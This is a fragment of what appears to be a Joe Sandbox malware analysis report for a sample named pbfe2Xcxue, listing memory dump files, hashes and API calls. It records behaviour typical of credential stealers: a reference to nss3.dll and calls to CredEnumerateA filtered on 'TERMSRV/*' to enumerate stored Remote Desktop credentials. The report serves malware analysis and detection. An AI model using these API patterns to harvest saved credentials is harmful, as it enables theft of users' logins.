                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectorylstrlen
                                        • String ID: nss3.dll
                                        • API String ID: 2713697268-2492180550
                                        • Opcode ID: 8159e891e3e9b5010d482309a0aa0b8622a4278e766383ae9c9b589065a62e3d
                                        • Instruction ID: 3dbaa2c37eb9edeac60df4c98f539187ff96b7e476cc496900b0400eb7fd0e01
                                        • Opcode Fuzzy Hash: 8159e891e3e9b5010d482309a0aa0b8622a4278e766383ae9c9b589065a62e3d
                                        • Instruction Fuzzy Hash: 58115E71611A04EFD7113F60ED097CA3BA3BB95355F248036F847E42E1D7B94DA48A4E
                                        APIs
                                        • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CFD7
                                        • CredFree.ADVAPI32(00000000), ref: 0040D01E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cred$EnumerateFree
                                        • String ID: TERMSRV/*
                                        • API String ID: 3403564193-275249402
                                        • Opcode ID: a599282d23594c5ea52c5ecc8fafc165b728aef28e1290e5b66d6eb2e80e641b
                                        • Instruction ID: bbd0f44d2efdce0af323f0fe118246b392c9dfa6248d013bbb57161547d8bba6
                                        • Opcode Fuzzy Hash: a599282d23594c5ea52c5ecc8fafc165b728aef28e1290e5b66d6eb2e80e641b
                                        • Instruction Fuzzy Hash: 73110931801604EBDF31CF88D909BEAB7F5AB14309F14407BD645711E0C779AA99EB99